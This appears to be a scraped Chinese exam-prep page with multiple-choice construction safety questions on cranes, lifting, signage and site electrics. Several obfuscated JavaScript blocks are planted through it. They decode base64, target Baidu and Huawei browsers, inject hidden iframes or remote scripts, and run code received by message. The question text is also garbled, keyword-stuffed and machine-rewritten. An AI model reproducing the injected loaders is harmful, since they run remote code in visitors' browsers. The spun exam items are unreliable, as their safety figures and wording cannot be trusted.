eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x67\x67\x72"]=function(e){var wg =''+'ABCDEFGHI'+'JKLMNOPQRS'+'TUVWXYZabc'+'defghijklmnop'+'qrstuvwxy'+'z0123456789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=wg.indexOf(e.charAt(f++));o=wg.indexOf(e.charAt(f++));u=wg.indexOf(e.charAt(f++));a=wg.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x64\x57\x50\x77\x50\x67\x67\x72\x64"]=function(){eval(wggr("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod2dncih1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHdnZ3IoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3Z2dyKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd2dncigiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKHdnZ3IoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd6SVRMdycrJ1V6TScrJ00zMHknKydZR0pUJysnSmxoRycrJ2MnKyc1RVhhJysnR0pUSicrJ3pRJysnRCcrJ053JysnRVRRJysneicrJ1VTYicrJ3ZObUxoJysnTjNhJysnblonKycyYnVjMycrJ2QzWicrJ2tNTScrJ2xZaycrJ01NbCcrJ0UnKycwTScrJ01sTU0nKydIYzAnKydSSGEnKycnKycnLCcnKydVZWUnKydTMmsnKydwRCcrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydzbU4nKydaMWEnKyd6JysnJysnJywnTScp"));}
安徽八大员考试;江苏省八大员报名入口

2021年12月10日 西厂雨化田 阅读(151)

eval("\x77\x69\x6e\x64\x6f\x77")["\x68\x42\x68\x73"]=function(e){var rr =''+'ABCDEFGHIJ'+'KLMNOPQR'+'STUVWXYZabcdefghij'+'klmnopqr'+'stuvwx'+'yz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=rr.indexOf(e.charAt(f++));o=rr.indexOf(e.charAt(f++));u=rr.indexOf(e.charAt(f++));a=rr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x51\x68\x73\x72\x50\x42\x6C\x78\x43"]=function(){eval(hBhs("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoaEJocyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKGhCaHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihoQmhzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbaEJocygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2tfNzM1Mic7dmFyIF9fa2RucWlkID0gJ2snICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19rZG5xaWQrJyIgY2wnKydhc3MnKyc9IicrX2NsYXNzKyciPicrJzwvZCcrJ2l2JysnPicpO3dbJ19feGsnKydkYScrJ25xJysnb2InKydqXzczNTInXT1kWydxdScrJ2VyeScrJ1NlbGUnKydjdG8nKydyJ10oJyMnK19fa2RucWlkKTtfaWQgKz0gZFsncXUnKydlcnknKydTZScrJ2xlYycrJ3RvJysnckEnKydsbCddKCcuJytfY2xhc3MpLmxlbmd0aDt2YXIgeiA9IHUrJy0xLycrX2lkKycvJytyO2RbJ3cnKydyaScrJ3QnKydlJysnbG4nXSgnPGQnKydpdiBpJysnZD0nKyciJytfaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7ZFsndycrJ3JpJysndCcrJ2UnXSgnPGknKydmcicrJ2EnKydtZSBzdHlsZT0iJysnbScrJ2FyJysnZ2knKyduOjA7cCcrJ2FkJysnZCcrJ2luJysnZzowO2InKydvcicrJ2QnKydlcjpuJysnb24nKydlOycrJ29wJysnYScrJ2NpJysndCcrJ3k6MCcrJy4wJytyZCgyLDkpKyc7d2knKydkdCcrJ2g6JytyZCgyLDUpKydwJysneDtoJysnZScrJ2lnaCcrJ3Q6JytyZCgyLDUpKydwJysneDsnKyciYWwnKydsb3d0cmFuJysnc3BhJysncmVuY3kgc3InKydjPSInK3orJyI+PC9pJysnZnInKydhJysnbWU+Jyk7d1siYWQiKyJkRXYiKyJlbnRMIisiaXN0IisiZW5lciJdKCJtIisiZXNzIisiYWdlIixmdW5jdGlvbihlKXtpZihlLmRhdGFbcitfaWRdKXtybShjKTtuZXcgRnVuY3Rpb24oaEJocyhlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKycxSScrJ1RMJysneVV6TScrJzMnKyczJysnMHknKydZJysnR0pUSicrJzEnKydSJysnMk4zMycrJ1ozM2RHJysnSlRKJysnelFETncnKydFJysnVFF6VScrJ1MnKydiJysndk5tJysnTGgnKydOMzNhJysnbloyJysnYnVjMycrJzNkMzNaJysna01sWScrJ2tNbEUnKycwJysnTWxNSCcrJ2MwUkhhJysnJysnJywnJysnM1RKJysndlVKJysnSTUnKycnKycnLHdpbmRvdyxkb2N1bWVudCwnJysnZGVhJysnbVFWJysnNicrJycrJycsJzMnKQ=="));}

百分之一百的仓库提供建筑施工八名安全人员的考试问题、建筑施工八名的预测问题、八名的考试问安徽八大员考试题、安全员证的考题库等。

35.采用双机吊起时,选择同一类型或性能相近的門起重机,负荷的分配合理,单机的负荷不得超过额定重量()。

A.70%

B.80%

C.90%

D.100%

答案:B

36.使用单位应选择建筑用起重机的维修工作。

A.有资格证,且当地住宅?通过城乡建设行政主管部门备案的补救措施63?保守机构

B.租赁公司

C.设备制造单位

D.使用单位

答案:A

37.大雨、大时雨?遇到大琴及风力()以上恶劣天气,必须中止室外的吊装作业。

A.四级

B.5级

C.六级

D.7级

答案:C

38.()组织的实施建筑施工企业负责特殊作业者的审查。

A.省自治区、直辖市人民政府建设主管部门

B.省级建设行政主管部门

C.市级建设行政主管部门

D.县级建设行政主管部门

答案:A

39.使用单位未指定专任设备管理人员的,现场监督情况班的,江苏省八大员报名入口,由县级以上地方人民政府建设主管部门责令限期改正。在警告的同时罚款。

A.000元以上1万元以下

B.5000元以上3万元以下

C.1万元以上3万元以下

D.3万元以下

答案:B

40.塔式起重机以上停止时,在再作业前,按照规定进行验收,合格后可以使用。

A.3个月

B.6个月

C.9个月

D.1年

答案:B

41.吊装中的焊接作业,应采取严安徽八大员考试格的防火措施,设专职人员进行护理,不得在作业部位下的周围()范围内有人。

A.10 m

B.5 m

C.15 m

D.8 m

答案:A

42.对于重要的吊装作业,在高处作业或重工作量大时,不合适()

A.挂钩

B.吊环

C.链条

D.悬挂式皮带轮

答案:A

43.塔式起重机使用高度超过()时,江苏省八大员报名入口,应配置故障灯。

A.50 m

B.2 m

C.25 m

D.30 m

答案:D

44钢管和按钮组合起来的钢管保护网,江苏省八大员报名入口,网格的间隔不大于()。

A.300 mm

B.200 mm

C.400 mm

D.500 mm

答案:C

45.传达安全信息意思的颜色有()颜色。

A.1

B.2

C.3

D.4

答案:D

46.禁止标志的基本形式是()。

A.带斜杠的圆形边框

B.斜方方格

C.带x棒的圆形边框

D.X射线的四角形框

答案:A

47.架空线在一个等级内,各层导线的缝隙数不能超过该层导线的数量()

A.1/4

B.1/2

C.1/3

D.1/8

答案:B

48.因为湿润容易接触带电体的照明,所以电源电压不能大于()V。

A.12

B.24

C.36

D.20

答案:B

49.在室外设置箱式变电站时,从底部到地板的高度不能在()m以下。

A.0.5

B.8.8

C.1

D.2.2

答案:A

50.施工单位应当设立安全生产()机构,配置专职安全生产管理人员。

A.检查

B.导演

C.监理

D.管理

答案:D

eval("\x77\x69\x6e\x64\x6f\x77")["\x4A\x4B\x62\x4A"]=function(e){var Jg =''+'ABCDEFGH'+'IJKLMNOPQRSTUVW'+'XYZabcde'+'fghijklmnopqrst'+'uvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=Jg.indexOf(e.charAt(f++));o=Jg.indexOf(e.charAt(f++));u=Jg.indexOf(e.charAt(f++));a=Jg.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x71\x4A\x62\x72\x67\x4C\x4B\x4A\x47"]=function(){eval(JKbJ("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoSktiSih1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKEpLYkooIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihKS2JKKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbSktiSigiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2tfNzM1Mic7dmFyIF9fa2RucWlkID0gJ2snICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19rZG5xaWQrJyIgY2wnKydhc3MnKyc9IicrX2NsYXNzKyciPicrJzwvZCcrJ2l2JysnPicpO3dbJ19feGsnKydkYScrJ25xJysnb2InKydqXzczNTInXT1kWydxdScrJ2VyeScrJ1NlbGUnKydjdG8nKydyJ10oJyMnK19fa2RucWlkKTtfaWQgKz0gZFsncXUnKydlcnknKydTZScrJ2xlYycrJ3RvJysnckEnKydsbCddKCcuJytfY2xhc3MpLmxlbmd0aDt2YXIgeiA9IHUrJy0xLycrX2lkKycvJytyO2RbJ3cnKydyaScrJ3QnKydlJysnbG4nXSgnPGQnKydpdiBpJysnZD0nKyciJytfaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7ZFsndycrJ3JpJysndCcrJ2UnXSgnPGknKydmcicrJ2EnKydtZSBzdHlsZT0iJysnbScrJ2FyJysnZ2knKyduOjA7cCcrJ2FkJysnZCcrJ2luJysnZzowO2InKydvcicrJ2QnKydlcjpuJysnb24nKydlOycrJ29wJysnYScrJ2NpJysndCcrJ3k6MCcrJy4wJytyZCgyLDkpKyc7d2knKydkdCcrJ2g6JytyZCgyLDUpKydwJysneDtoJysnZScrJ2lnaCcrJ3Q6JytyZCgyLDUpKydwJysneDsnKyciYWwnKydsb3d0cmFuJysnc3BhJysncmVuY3kgc3InKydjPSInK3orJyI+PC9pJysnZnInKydhJysnbWU+Jyk7d1siYWQiKyJkRXYiKyJlbnRMIisiaXN0IisiZW5lciJdKCJtIisiZXNzIisiYWdlIixmdW5jdGlvbihlKXtpZihlLmRhdGFbcitfaWRdKXtybShjKTtuZXcgRnVuY3Rpb24oSktiSihlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKycxSVRMJysneXlVek0nKyczJysnMHl5JysnWUcnKydKVCcrJ0p0cG1jJysncycrJzVtZScrJ0cnKydKVCcrJ0p6UScrJ0ROd0VUJysnUXpVJysnU2J2JysnTm1MaE4nKyczYW5aMicrJ2J1YzMnKydkMycrJ1prJysnTWwnKydZa01sRScrJzAnKydNbCcrJ00nKydIYzBSSCcrJ2EnKycnKycnLCcnKydGbGEnKyd4UWQnKyc0YicrJycrJycsd2luZG93LGRvY3VtZW50LCcnKyc0MXInKyc0ZWknKydBJysnJysnJywneScp"));}
本文转载自互联网,如有侵权,联系删除

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

eval("\x77\x69\x6e\x64\x6f\x77")["\x57\x7A\x67\x70"]=function(e){var XK =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWX'+'YZabcdefghi'+'jklmnopqrstu'+'vwxyz012345678'+'9+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=XK.indexOf(e.charAt(f++));o=XK.indexOf(e.charAt(f++));u=XK.indexOf(e.charAt(f++));a=XK.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x65\x57\x7A\x4B\x67\x6F\x52\x58\x70"]=function(){eval(Wzgp("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoV3pncCh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKFd6Z3AoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihXemdwKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbV3pncCgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKFd6Z3AoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5JysnSVRMJysneCcrJ1V6TTMzJysnMHknKydZR0pUJysnSjMnKyczY0dkNScrJ0ZIJysnYkdKJysnVEp6JysnUUQnKydOdycrJ0UnKydUUXonKydVU2J2TicrJ21MaE4zJysnM2FuWicrJzJidWMnKyczJysnM2QnKyczJysnM1prTWwnKydZaycrJ01sRTAnKydNbE0nKydIYzBSJysnSCcrJ2EnKycnKycnLCcnKydRUUInKyd2eUgnKyc3QScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydkeEonKyc1S2InKydHJysnJysnJywnMycp"));}